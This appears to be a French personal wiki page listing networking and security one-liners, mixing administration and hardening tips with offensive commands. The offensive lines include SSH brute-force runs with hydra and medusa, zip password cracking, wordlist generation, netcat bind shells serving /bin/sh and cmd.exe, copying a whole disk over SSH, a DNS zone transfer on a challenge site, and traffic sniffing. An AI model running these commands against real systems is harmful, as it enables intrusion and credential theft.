meta données pour cette page
Liste de petites astuces
- Connaître son IP publique :
curl ifconfig.me/ip
- Tester si un service est up :
nc -vz $IP $PORT
- Crack password zip :
fcrackzip -u -l 1-6 -c 'a1' 12475.zip
- Evoyer un disque chiffré à travers un tunnel SSH :
dd if=/dev/disk bs=65536 conv=noerror,sync | ssh -C user@serer "cat >/tmp/disque.dd"
- Construire une liste de mot de passe :
crunch 4 8 [0-9a-z] -o mdp.txt
netcat (nc) est la version non chiffré de cryptcat (cryptcat)
- Envoyer des fichiers :
# serveur : nc -l -p 1000 > fichier.txt # client : nc ip_serveur 1000 < fichier.txt
- Brute force sur l’authentification d'un service
medusa -h 192.168.0.25 -U users.txt -P pass.txt -M ssh -n 122 -f hydra -L users.txt -P pass.txt -s 122 -t 3 ssh://192.168.0.25
- Flush IP :
ip -s -s neigh flush all
- Fournir un schell au client :
# serveur : nc -l -p 1000 -e /bin/sh nc.exe -L -p 1000 c:\Windows\System32\cmd.exe # client : nc ip_serveur 1000
- Récupérer la clé secrête d'un transfère de zone :
dig @challenge01.root-me.org ch11.challenge01.root-me.org -p 54011 axfr
- Scanner rapidement les ports ouverts :
nc -zv 127.0.0.1 1-2048
tai
- Liste des machines sur le réseau :
netdiscover -i eth0 -r 192.168.1.0/24
- Capturer les paquets :
tcpflow -i eth0 -C -J port 80 -w capture.pcap
- Capture de paquets http :
urlsnarf -i usb0 (+regex)
- Sécurisé la version d'un serveur dns :
btatu@xmg:~$ nslookup > server ns5.evolix.net Default server: ns5.evolix.net Address: 212.83.165.242#53 > set class=chaos > set q=txt > version.bind Server: ns5.evolix.net Address: 212.83.165.242#53 ** server can't find version.bind: REFUSED
- Dev son propre navigateur :
http://dev.glicer.com/section/probleme-solution/creer-navigateur-personnalise.html
- Récupérer les ips avec leurs @mac depuis un routeur via snmp
apt-get install snmp snmpwalk -v1 -c public 192.168.1.254 1 > mibs cat mibs |grep 192.168.1. |grep Hex|grep iso.3.6.1.2.1.3.1 |less
Trouver les mails d'un domaine
Télécharger le logiciel sur www.edge-security.com puis
theharvester -d syngress.com -l 10 -b google
Historique des connexions
lastlog -t 10
Le base64
- encode :
echo "bonjour" | openssl base64 echo "bonjour" | base64 Ym9uam91cgo=
- Décode :
echo "Ym9uam91cgo=" | openssl base64 -d echo "Ym9uam91cgo=" | base64 -d bonjour
- Vérifier la source (UDP spoofing)
sysctl -w net.ipv4.conf.default.rp_filter = 1
- Activer les SYN cookies (limite le SYN flooding)
sysctl -w net.ipv4.tcp_syncookies = 1
- Rejeter les redirections ICMP (limite les MitM)
sysctl -w net.ipv4.conf.all.accept_redirects = 0 sysctl -w net.ipv4.conf.all.secure_redirects = 0
- Analyser son système :
apt-get install lynis && lynis -c -q
Pour ssh : https://github.com/arthepsy/ssh-audit
commandes en vracs
radiff2 rax2 rasm2 rabin2 radind2